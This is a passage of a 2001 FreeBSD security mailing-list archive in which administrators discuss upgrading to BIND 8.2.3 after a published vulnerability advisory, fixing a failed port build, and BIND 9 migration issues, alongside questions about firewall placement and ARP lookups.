``interesting'' bugs appear. -GAWollman -- Garrett A. Wollman | O Siem / We are all family / O Siem / We're all the same wollman@lcs.mit.edu | O Siem / The fires of freedom Opinions not those of| Dance in the burning flame MIT, LCS, CRS, or NSA| - Susan Aglukark and Chad Irschick To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jan 29 16: 6:23 2001 Delivered-To: freebsd-security@freebsd.org Received: from pozitif.net (unknown [213.194.71.201]) by hub.freebsd.org (Postfix) with SMTP id 5405E37B69E for ; Mon, 29 Jan 2001 16:06:01 -0800 (PST) Received: from pozitif.net ([62.29.24.236]) by pozitif.net ; Tue, 30 Jan 2001 02:14:13 +0200 Message-ID: <3A760579.3126158B@pozitif.net> Date: Tue, 30 Jan 2001 02:06:17 +0200 From: Mehmet Hinc X-Mailer: Mozilla 4.76 [en] (X11; U; FreeBSD 4.2-RELEASE i386) X-Accept-Language: en MIME-Version: 1.0 To: freebsd-security@freebsd.org Subject: bind8.2.3 and installation problem Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Patching file doc/man/Makefile using Plan A... Hunk #1 succeeded at 52. Hunk #2 succeeded at 105. done Hmm... Looks like a unified diff to me... The text leading up to this was: -------------------------- |--- src/bin/Makefile.orig Sat Dec 23 00:02:48 2000 |+++ src/bin/Makefile Mon Jan 29 14:11:13 2001 -------------------------- Patching file src/bin/Makefile using Plan A... Hunk #1 failed at 58. 1 out of 1 hunks failed--saving rejects to src/bin/Makefile.rej done >> Patch patch-ac failed to apply cleanly. >> Patch(es) patch-aa patch-ab applied cleanly. *** Error code 1 Stop in /usr/ports/net/bind8. *** Error code 1 Stop in /usr/ports/net/bind8. *** Error code 1 What ??????????? Why??????????? I updated my ports and tried to install bind8.2.3 because bind8.2.2 has had a vulnerability , so While I was installing it, I had a error msgs. (in the up) please let me know How can I fix it !!! Thanks all Mehmet Hinc >From Turkey To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jan 29 16:38:42 2001 Delivered-To: freebsd-security@freebsd.org Received: from horsey.gshapiro.net (horsey.gshapiro.net [209.220.147.178]) by hub.freebsd.org (Postfix) with ESMTP id 55D9F37B404 for ; Mon, 29 Jan 2001 16:38:22 -0800 (PST) Received: (from gshapiro@localhost) by horsey.gshapiro.net (8.12.0.Beta0/8.12.0.Beta0) id f0U0cKTs006954; Mon, 29 Jan 2001 16:38:20 -0800 (PST) MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Message-ID: <14966.3324.107528.104198@horsey.gshapiro.net> Date: Mon, 29 Jan 2001 16:38:20 -0800 From: Gregory Neil Shapiro To: Alfred Perlstein Cc: Kris Kennaway , security@FreeBSD.ORG Subject: Re: BIND 8.2.3 upgrade available In-Reply-To: <20010129153144.H26076@fw.wintelcom.net> References: <20010129143300.A38419@xor.obsecurity.org> <20010129153144.H26076@fw.wintelcom.net> X-Mailer: VM 6.90 under 21.2 (beta41) "Polyhymnia" XEmacs Lucid Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org bright> Is there any chance that the bind and sendmail people could backport bright> -DNO_SENDMAIL and -DNO_NAMED to 3.x (and maybe 2.x)? What does the BIND bug have to do with sendmail? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jan 29 17: 2:59 2001 Delivered-To: freebsd-security@freebsd.org Received: from andromeda.frogtongue.com (dsl-006-a.resnet.purdue.edu [128.211.160.82]) by hub.freebsd.org (Postfix) with ESMTP id EF6A637B402 for ; Mon, 29 Jan 2001 17:02:39 -0800 (PST) Received: from localhost (remy@localhost) by andromeda.frogtongue.com (8.11.1/8.11.0) with ESMTP id f0U12BK18200; Mon, 29 Jan 2001 20:02:17 -0500 (EST) (envelope-from remy@frogtongue.com) Date: Mon, 29 Jan 2001 20:02:11 -0500 (EST) From: Remy Wisaksono To: Kris Kennaway Cc: Peter Brezny , freebsd-security@FreeBSD.ORG Subject: Re: [COVERT-2001-01] Multiple Vulnerabilities in BIND - FreeBSD Implications ? In-Reply-To: <20010129133658.A27202@xor.obsecurity.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I upgraded my bind8.2.3-T6B and when typing "named -v" command, I get the 8.2.3-T6B ver. When typing the following comman, "nslookup -q=txt -class=CHAOS version.bind. 0" I got; VERSION.BIND text = "8.2.3-REL" (also I did check my log file ....everyting looks good now.) --------------------- Remy Wisaksono scytale_z@hotmail.com remy@frogtongue.com --------------------- On Mon, 29 Jan 2001, Kris Kennaway wrote: > On Mon, Jan 29, 2001 at 04:25:57PM -0500, Peter Brezny wrote: > > named -v on my 4.2-stable system reports 8.2.3-T6B > > > > >From the advisory I was under the impression that this one was ok. Did I > > miss something? > > Yes, it affects all versions before 8.2.3-RELEASE. > > Kris > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jan 29 17: 9: 2 2001 Delivered-To: freebsd-security@freebsd.org Received: from earth.backplane.com (earth-nat-cw.backplane.com [208.161.114.67]) by hub.freebsd.org (Postfix) with ESMTP id 3586137B402 for ; Mon, 29 Jan 2001 17:08:43 -0800 (PST) Received: (from dillon@localhost) by earth.backplane.com (8.11.1/8.9.3) id f0U18MO81199; Mon, 29 Jan 2001 17:08:22 -0800 (PST) (envelope-from dillon) Date: Mon, 29 Jan 2001 17:08:22 -0800 (PST) From: Matt Dillon Message-Id: <200101300108.f0U18MO81199@earth.backplane.com> To: Remy Wisaksono Cc: Kris Kennaway , Peter Brezny , freebsd-security@FreeBSD.ORG Subject: Re: [COVERT-2001-01] Multiple Vulnerabilities in BIND - FreeBSD Implications ? References: Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Ok, I'm really confused now. I am currently running 8.2.3-T6B. Do I need to upgrade or am I ok? If I need to upgrade, is the patch in the tree now or do I need to wait? Thanks, -Matt To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jan 29 17:22:20 2001 Delivered-To: freebsd-security@freebsd.org Received: from citusc17.usc.edu (citusc17.usc.edu [128.125.38.177]) by hub.freebsd.org (Postfix) with ESMTP id 8A2C837B698 for ; Mon, 29 Jan 2001 17:22:02 -0800 (PST) Received: (from kris@localhost) by citusc17.usc.edu (8.11.1/8.11.1) id f0U1Pfb01662; Mon, 29 Jan 2001 17:25:42 -0800 (PST) (envelope-from kris) Date: Mon, 29 Jan 2001 17:25:40 -0800 From: Kris Kennaway To: Remy Wisaksono Cc: freebsd-security@FreeBSD.ORG Subject: Re: [COVERT-2001-01] Multiple Vulnerabilities in BIND - FreeBSD Implications ? Message-ID: <20010129172540.B1562@citusc17.usc.edu> References: <20010129133658.A27202@xor.obsecurity.org> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="bp/iNruPH9dso1Pn" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from remy@frogtongue.com on Mon, Jan 29, 2001 at 08:02:11PM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --bp/iNruPH9dso1Pn Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Mon, Jan 29, 2001 at 08:02:11PM -0500, Remy Wisaksono wrote: >=20 > I upgraded my bind8.2.3-T6B and when typing > "named -v" command, I get the 8.2.3-T6B ver. >=20 > When typing the following comman,=20 > "nslookup -q=3Dtxt -class=3DCHAOS version.bind. 0" > I got; > VERSION.BIND text =3D "8.2.3-REL" >=20 > (also I did check my log file ....everyting looks good now.) Well, it seems you didn't actually upgrade it properly :-) Kris --bp/iNruPH9dso1Pn Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE6dhgUWry0BWjoQKURAm9dAKCwGxLSIp8LMfyEBvvtqLKJyRUKzACg78Yb tqsza+1Zgqh+S05Y1MUFGYY= =oPB0 -----END PGP SIGNATURE----- --bp/iNruPH9dso1Pn-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jan 29 17:34:49 2001 Delivered-To: freebsd-security@freebsd.org Received: from delivery.insweb.com (delivery.insweb.com [12.16.212.64]) by hub.freebsd.org (Postfix) with ESMTP id BC9C937B402 for ; Mon, 29 Jan 2001 17:34:31 -0800 (PST) Received: from ursine.com (dhcp4-202.secure.insweb.com [192.168.4.202]) by delivery.insweb.com (8.9.2/8.9.3) with ESMTP id RAA29555; Mon, 29 Jan 2001 17:34:30 -0800 (PST) (envelope-from fbsd-secure@ursine.com) Message-ID: <3A761A26.4F520934@ursine.com> Date: Mon, 29 Jan 2001 17:34:30 -0800 From: Michael Bryan X-Mailer: Mozilla 4.76 [en] (WinNT; U) X-Accept-Language: en MIME-Version: 1.0 To: freebsd-security@FreeBSD.ORG Cc: Matt Dillon Subject: Re: [COVERT-2001-01] Multiple Vulnerabilities in BIND - FreeBSDImplications ? References: <200101300108.f0U18MO81199@earth.backplane.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Matt Dillon wrote: > > Ok, I'm really confused now. I am currently running 8.2.3-T6B. > > Do I need to upgrade or am I ok? You need to upgrade. The ISC web site has a good list of all known BIND vulnerabilities and which versions are affected for each one: http://www.isc.org/products/BIND/bind-security.html In particular, the info on the "TSIG" vulnerability says that all beta versions of 8.2.3 are vulnerable. Since 8.2.3-T6B is a beta version, it is therefore vulnerable. > If I need to upgrade, is the patch > in the tree now or do I need to wait? I believe the latest message from Kris was that 4.x-STABLE has the updated BIND integrated, and 3.x-STABLE should be updated by tomorrow. If you update via the bind8 port instead, it has also been updated for 8.2.3. The bind8 port puts files in a different location than the BIND files from the base system install, so be careful if you do that, especially making sure your /etc/rc.conf will start the correct version. The prebuilt packages directory at freebsd.org still had just 8.2.2-p7, as far as I could tell, but that will presumably change over the next day or two. Or you -could- just download 8.2.3 directly from ISC (www.isc.org), and install it that way. Some files might end up in slightly different directories, but I believe that's the only impact you'll see (although somebody is sure to pipe up if I'm wrong on that one.) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jan 29 17:38:31 2001 Delivered-To: freebsd-security@freebsd.org Received: from xgate4.sd.co.nz (ns.netxsecure.com [210.55.57.156]) by hub.freebsd.org (Postfix) with ESMTP id BF64237B400 for ; Mon, 29 Jan 2001 17:38:12 -0800 (PST) Received: from netxsecure.net (xmgate-172-2.sd.co.nz [172.16.30.2]) by xgate4.sd.co.nz (8.11.0/8.11.0) with ESMTP id f0U1xxE15062; Tue, 30 Jan 2001 14:59:59 +1300 (NZDT) Message-ID: <3A761E44.1E7306FB@netxsecure.net> Date: Tue, 30 Jan 2001 14:52:04 +1300 From: "Michael A. Williams" X-Mailer: Mozilla 4.75 [en] (X11; U; Linux 2.2.5-22 i586) X-Accept-Language: en MIME-Version: 1.0 To: Matt@netxsecure.net, Dillon@netxsecure.net Cc: freebsd-security@FreeBSD.ORG Subject: Re: [COVERT-2001-01] Multiple Vulnerabilities in BIND - FreeBSDImplications ? References: <200101300108.f0U18MO81199@earth.backplane.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-Archived: msg.Arcx4874@xgate4 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Matt Dillon wrote: > > Ok, I'm really confused now. I am currently running 8.2.3-T6B. > > Do I need to upgrade or am I ok? If I need to upgrade, is the patch > in the tree now or do I need to wait? > Hi Matt, According to: Subject: [COVERT-2001-01] Multiple Vulnerabilities in BIND Date: Mon, 29 Jan 2001 06:31:55 -0800 From: COVERT Labs To: BUGTRAQ@SECURITYFOCUS.COM Vulnerable Systems BIND 8 versions: 8.2, 8.2.1 8.2.2 through to 8.2.2-P7 8.2.3-T1A through to 8.2.3-T9B <--- 8.2.3-T6B fits in here. BIND 4 versions: buffer overflow - 4.9.5 through to 4.9.7 format string - 4.9.3 through to 4.9.5-P1 You are vulnerable and do need to upgrade. Mike. -- Michael A. Williams, InfoSec Technology Manager NetXSecure NZ Limited, mike@netxsecure.net www.netxsecure.com Ph.+64.9.278.8348, Fax.+64.9.278.8352, Mob.+64.21.995.914 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jan 29 17:43:28 2001 Delivered-To: freebsd-security@freebsd.org Received: from earth.backplane.com (earth-nat-cw.backplane.com [208.161.114.67]) by hub.freebsd.org (Postfix) with ESMTP id DC89437B402 for ; Mon, 29 Jan 2001 17:43:10 -0800 (PST) Received: (from dillon@localhost) by earth.backplane.com (8.11.1/8.9.3) id f0U1hAJ82170; Mon, 29 Jan 2001 17:43:10 -0800 (PST) (envelope-from dillon) Date: Mon, 29 Jan 2001 17:43:10 -0800 (PST) From: Matt Dillon Message-Id: <200101300143.f0U1hAJ82170@earth.backplane.com> To: Michael Bryan Cc: freebsd-security@FreeBSD.ORG Subject: Re: [COVERT-2001-01] Multiple Vulnerabilities in BIND - FreeBSDImplications ? References: <200101300108.f0U18MO81199@earth.backplane.com> <3A761A26.4F520934@ursine.com> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Thank you for clearing up the issue, gentlemen! -Matt To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jan 29 18: 9:20 2001 Delivered-To: freebsd-security@freebsd.org Received: from obsecurity.org (adsl-64-169-104-72.dsl.lsan03.pacbell.net [64.169.104.72]) by hub.freebsd.org (Postfix) with ESMTP id 4166E37B402 for ; Mon, 29 Jan 2001 18:09:00 -0800 (PST) Received: by obsecurity.org (Postfix, from userid 1000) id C9E4DBA4E8; Mon, 29 Jan 2001 18:09:29 -0800 (PST) Date: Mon, 29 Jan 2001 18:09:29 -0800 From: Kris Kennaway To: Mehmet Hinc Cc: freebsd-security@FreeBSD.ORG Subject: Re: bind8.2.3 and installation problem Message-ID: <20010129180929.C38900@xor.obsecurity.org> References: <3A75FABD.AA021EE2@pozitif.net> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="H8ygTp4AXg6deix2" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <3A75FABD.AA021EE2@pozitif.net>; from marduk@pozitif.net on Tue, Jan 30, 2001 at 01:20:29AM +0200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --H8ygTp4AXg6deix2 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline On Tue, Jan 30, 2001 at 01:20:29AM +0200, Mehmet Hinc wrote: > Patching file doc/man/Makefile using Plan A... > Hunk #1 succeeded at 52. > Hunk #2 succeeded at 105. > done > Hmm... Looks like a unified diff to me... > The text leading up to this was: > -------------------------- > |--- src/bin/Makefile.orig Sat Dec 23 00:02:48 2000 > |+++ src/bin/Makefile Mon Jan 29 14:11:13 2001 > -------------------------- > Patching file src/bin/Makefile using Plan A... > Hunk #1 failed at 58. > 1 out of 1 hunks failed--saving rejects to src/bin/Makefile.rej > done > >> Patch patch-ac failed to apply cleanly. You have the old files/patch-ac. Try updating again..I just verified that the port does indeed build correctly on a freshly cvsupped system. Kris --H8ygTp4AXg6deix2 Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE6diJZWry0BWjoQKURAuv7AJ91waKofVGa0yf8UYtysgDIRIzoOACfbX0o pXfDreK/YjidXggeXzM9EpQ= =DFUy -----END PGP SIGNATURE----- --H8ygTp4AXg6deix2-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jan 29 18:43:27 2001 Delivered-To: freebsd-security@freebsd.org Received: from albatross.prod.itd.earthlink.net (albatross.prod.itd.earthlink.net [207.217.120.120]) by hub.freebsd.org (Postfix) with ESMTP id 2419E37B400 for ; Mon, 29 Jan 2001 18:43:07 -0800 (PST) Received: from pavilion (user-33qtsp5.dialup.mindspring.com [199.174.243.37]) by albatross.prod.itd.earthlink.net (EL-8_9_3_3/8.9.3) with SMTP id SAA28822 for ; Mon, 29 Jan 2001 18:43:05 -0800 (PST) Message-ID: <00c901c08a66$5f1ce3c0$0101a8c0@pavilion> From: "Richard Ward" To: Subject: BIND 9.1 woes Date: Mon, 29 Jan 2001 21:43:03 -0500 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.2014.211 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2615.200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I just downloaded the BIND 9.1 tarball after hearing about the chaos = with previous versions. I did run into something odd that I can't quite = figure out, it's also mentioned in the 9.1 documentation and I'm sure = some one knows the answer. I managed to start BIND fine, yet digging = through the logs I ran into this line that makes me wonder. entropy.c:948: unexpected error: fcntl(8, F_SETFL, 4): Inappropriate ioctl for device Could some one shed light on this "problem"? Also, when trying to start = BIND 9.1, it will start fine as 'named -g', though when I try to 'named = -u bind -g bind' (so it runs as that user/group) it doesn't launch to = the background, and fails to start period. Any ideas? (Sorry for all the = questions, I just moved from 8.X and am still getting used to the = changes/features) Thanks. Richard Ward mh@maKintosh.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jan 29 18:52:23 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.marketnews.com (mail.marketnews.com [205.183.200.2]) by hub.freebsd.org (Postfix) with ESMTP id 8108737B402 for ; Mon, 29 Jan 2001 18:52:05 -0800 (PST) Received: (from nobody@localhost) by mail.marketnews.com (8.11.0/8.9.3) id f0U2psU39919 for freebsd-security@FreeBSD.ORG; Mon, 29 Jan 2001 21:51:54 -0500 (EST) X-Authentication-Warning: mail.marketnews.com: nobody set sender to mharding@marketnews.com using -f To: Subject: My FreeBSD Firewall Message-ID: <980823114.3a762c4a041fa@mail.marketnews.com> Date: Mon, 29 Jan 2001 21:51:54 -0500 From: MIME-Version: 1.0 Content-Type: text/plain Content-Transfer-Encoding: 8bit User-Agent: IMP/PHP IMAP webmail program 2.2.0-pre13 X-Originating-IP: 63.23.134.35 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hello. I am building a Firewall and have some questions about how to implement it. The basic firewall is a FreeBSD box running squid for transparent proxy, IPFW for dummynet to rate limit syn's, and IPF as my main statefull packet filter. The problem I have is with putting this into production. I have a T1 to the internet, the routers IP address is 172.16.1.1(well not really but it works for the example) and all of the computers on the LAN are in the 172.16.1.0 (once again..only for the example) network. So here I get to the question....is there any way to set the firewall with the same IP address as the router to make the install fairly transparent to the users? Could I set the firewall up as 172.16.1.1 and use NAT to let it communicate with the router for internet traffic? How would I set up my routing tables? Also if anyone has any input as far as how I am building my firewall that would be very appreciated. Thank you, Mason To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jan 29 19: 1:43 2001 Delivered-To: freebsd-security@freebsd.org Received: from sonar.noops.org (adsl-63-195-97-84.dsl.snfc21.pacbell.net [63.195.97.84]) by hub.freebsd.org (Postfix) with ESMTP id F003037B402 for ; Mon, 29 Jan 2001 19:01:23 -0800 (PST) Received: from localhost (root@localhost) by sonar.noops.org (8.9.3/8.9.3) with ESMTP id TAA36124; Mon, 29 Jan 2001 19:01:27 -0800 (PST) (envelope-from root@noops.org) Date: Mon, 29 Jan 2001 19:01:27 -0800 (PST) From: Thomas Cannon To: mharding@marketnews.com Cc: freebsd-security@FreeBSD.ORG Subject: Re: My FreeBSD Firewall In-Reply-To: <980823114.3a762c4a041fa@mail.marketnews.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org If you want to add the firewall but keep the default gateway the same for all the clients you'll either have to do some sort of abracadabra magic with arp, or take the path of least resistance -- change the router's IP and make your firewall 127.16.1.1 Just my $.02 ... if even that much -tcannon On Mon, 29 Jan 2001 mharding@marketnews.com wrote: > Hello. I am building a Firewall and have some questions about how to implement > it. The basic firewall is a FreeBSD box running squid for transparent proxy, > IPFW for dummynet to rate limit syn's, and IPF as my main statefull packet > filter. The problem I have is with putting this into production. I have a T1 > to the internet, the routers IP address is 172.16.1.1(well not really but it > works for the example) and all of the computers on the LAN are in the 172.16.1.0 > (once again..only for the example) network. So here I get to the > question....is there any way to set the firewall with the same IP address as > the router to make the install fairly transparent to the users? Could I set > the firewall up as 172.16.1.1 and use NAT to let it communicate with the router > for internet traffic? How would I set up my routing tables? Also if anyone > has any input as far as how I am building my firewall that would be very > appreciated. > > Thank you, > Mason > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jan 29 19:10:30 2001 Delivered-To: freebsd-security@freebsd.org Received: from icmp.dhs.org (unknown [24.108.142.198]) by hub.freebsd.org (Postfix) with ESMTP id C3B3D37B400 for ; Mon, 29 Jan 2001 19:10:10 -0800 (PST) Received: from localhost (modulus@localhost) by icmp.dhs.org (8.11.1/8.11.1) with ESMTP id f0U3ESo24881 for ; Mon, 29 Jan 2001 21:14:28 -0600 (CST) (envelope-from modulus@icmp.dhs.org) Date: Mon, 29 Jan 2001 21:14:27 -0600 (CST) From: disassembled To: freebsd-security@FreeBSD.ORG Subject: mapping arp Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I was wondering if there was anyway i could map an mac address back to it's assigned IP address without using a rarpd. something i was considering writing was using writing a program that sent out a series of arp who-has packets to the network then run a cmp on the 48-bit values that returned in the replies against some mac address that would be supplied on the command line. if anyone knows anything about that & could help me out; i would be greatful. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jan 29 19:15:58 2001 Delivered-To: freebsd-security@freebsd.org Received: from cage.simianscience.com (cage.simianscience.com [64.7.134.1]) by hub.freebsd.org (Postfix) with ESMTP id 6D88C37B400 for ; Mon, 29 Jan 2001 19:15:37 -0800 (PST) Received: (from root@localhost) by cage.simianscience.com (8.11.1/8.11.1) id f0U3Fal00721 for freebsd-security@freebsd.org; Mon, 29 Jan 2001 22:15:36 -0500 (EST) (envelope-from mike@sentex.net) Received: from chimp (fcage [192.168.0.2]) by cage.simianscience.com (8.11.1/8.11.1av) with ESMTP id f0U3FTe00713 for ; Mon, 29 Jan 2001 22:15:30 -0500 (EST) (envelope-from mike@sentex.net) Message-Id: <4.2.2.20010129221351.03331388@marble.sentex.net> X-Sender: mdtancsa@marble.sentex.net X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.2 Date: Mon, 29 Jan 2001 22:15:28 -0500 To: freebsd-security@freebsd.org From: Mike Tancsa Subject: RE: BIND 8.2.3 upgrade available In-Reply-To: <4.2.2.20010129175758.03255570@marble.sentex.net> References: <006901c08a45$30d64860$46010a0a@sysadmininc.com> <20010129143300.A38419@xor.obsecurity.org> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed X-Virus-Scanned: by AMaViS perl-10 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 06:00 PM 1/29/2001 -0500, Mike Tancsa wrote: >At 05:45 PM 1/29/2001 -0500, Peter Brezny wrote: >>Is there a big reason why anyone would not want to just go ahead and run >>bind 9? > >I dont think all the features are there yet. At least the last time I >looked at it, there were some things unimplemented. Also, the >configuration is not totally compatible. I also found it to be a little >unpredictable when I tried version 9.0.1. Perhaps its more stable now, >but I personally would wait another month or so for it to shake out. Here is a good summary from the NANOG list by Greg Wood on some of the things missing, and some of the things that are different. >From: woods@weird.com (Greg A. Woods) >[ On Monday, January 29, 2001 at 01:36:42 (-0800), Eric A. Hall wrote: ] > > Subject: Re: sorry to ruin several of your evenings... > > > > Somebody asked about an in-place upgrade from BIND 8.x to BIND 9.1.0 > > (sorry I purged some mails before their time). Just for the sake of > > readiness, be aware that there are some 8.x options which are unsupported > > in 9.x. I did an in-place upgrade and had to make a few (mostly > > insignificant) changes which may be problematic for larger sites. > > > > The global config entries I had to remove were: > > > > fake-iquery yes > > multiple-cnames yes > > rfc2308-type1 yes > > check-names slave ignore > > maintain-ixfr-base true > >That's just the beginning! :-) > >Jan 29 13:37:46 proven /usr/pkg/sbin/named[22298]: option >'memstatistics-file' is not yet implemented >Jan 29 13:37:46 proven /usr/pkg/sbin/named[22298]: the default for the >'auth-nxdomain' option is now 'no' >Jan 29 13:37:46 proven /usr/pkg/sbin/named[22298]: option >'host-statistics' is not yet implemented >Jan 29 13:37:46 proven /usr/pkg/sbin/named[22298]: option 'use-id-pool' is >obsolete >Jan 29 13:37:46 proven /usr/pkg/sbin/named[22298]: option 'check-names' is >not implemented >Jan 29 13:37:47 proven /usr/pkg/sbin/named[22298]: unknown logging >category 'os' ignored >Jan 29 13:37:47 proven /usr/pkg/sbin/named[22298]: unknown logging >category 'parser' ignored >Jan 29 13:37:47 proven /usr/pkg/sbin/named[22298]: unknown logging >category 'load' ignored >Jan 29 13:37:47 proven /usr/pkg/sbin/named[22298]: unknown logging >category 'panic' ignored >Jan 29 13:37:47 proven /usr/pkg/sbin/named[22298]: unknown logging >category 'packet' ignored >Jan 29 13:37:47 proven /usr/pkg/sbin/named[22298]: unknown logging >category 'eventlib' ignored > >I don't yet know if "host-statistics" is still necessary to be able to >see the source of an RR in a dump file, or not, but if so then that'll >be a road-block in keeping me from using 9.1.0 in production. > >I'm also very partial to 'check-names'. I've been happy using the >following in many locations: > > check-names master fail; > check-names slave fail; > check-names response fail; > > >Even more critically the old 'ndc' program has been replaced by 'rndc', >which won't work until you've configured it (/etc/rndc.conf) *and* you >add "controls" statements to your /etc/named.conf to allow it to >connect, authenticate, and send commands. There doesn't seem to be a >default way of setting it up for local-only control. I haven't done >this yet > >Even worse than that the new BIND-9 'named' not only doesn't handle >signals in the same way as previous versions, but it shuts down instead >of ignoring SIGINT (which used to generate a dump file, which is why >I've not yet successfully generated and viewed a dump file to see if the >source of the RR is recorded in there!). So: > > >WARNING: Anyone with scripts or other programs that use signals >(i.e. kill(1), or kill(2)) to control their named process will almost >certainly have to re-code to work with BIND-9 (and use 'rndc' and/or its >mechanisms)! > > >You'll also find that the new named-checkconf fails if you use: > > options { > directory "/etc/namedb"; > }; > >and then try to do something like: > > include "named-rfc1918.conf"; > include "named-slave.conf"; > include "named-master.conf"; > >However the named process itself does seem to do the >chdir("/etc/namedb") before trying to do the "include"s, >and if you start named-checkconf from within the right >directory it'll work.... -------------------------------------------------------------------- Mike Tancsa, tel +1 519 651 3400 Network Administration, mike@sentex.net Sentex Communications www.sentex.net Cambridge, Ontario Canada www.sentex.net/mike To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jan 29 20:40:15 2001 Delivered-To: freebsd-security@freebsd.org Received: from marius.org (marius.org [216.88.115.170]) by hub.freebsd.org (Postfix) with ESMTP id C0E8037B404 for ; Mon, 29 Jan 2001 20:39:51 -0800 (PST) Received: (from marius@localhost) by marius.org (8.11.0/8.11.0) id f0U4diu15205; Mon, 29 Jan 2001 22:39:44 -0600 (CST) Date: Mon, 29 Jan 2001 22:39:43 -0600 From: Marius Strom To: Mike Tancsa Cc: freebsd-security@freebsd.org Subject: BIND9 Migration from BIND8 (Was: BIND 8.2.3 upgrade available) Message-ID: <20010129223943.L388@marius.org> Mail-Followup-To: Mike Tancsa , freebsd-security@freebsd.org References: <006901c08a45$30d64860$46010a0a@sysadmininc.com> <20010129143300.A38419@xor.obsecurity.org> <4.2.2.20010129175758.03255570@marble.sentex.net> <4.2.2.20010129221351.03331388@marble.sentex.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <4.2.2.20010129221351.03331388@marble.sentex.net>; from mike@sentex.net on Mon, Jan 29, 2001 at 10:15:28PM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I've posted the migration text file out of the bind-9.1.0 package at http://www.marius.org/~marius/unix/migration should anyone care for ISC's full details without downloading the full archive. On Mon, Jan 29, 2001 at 10:15:28PM -0500, Mike Tancsa wrote: > At 06:00 PM 1/29/2001 -0500, Mike Tancsa wrote: > >At 05:45 PM 1/29/2001 -0500, Peter Brezny wrote: > >>Is there a big reason why anyone would not want to just go 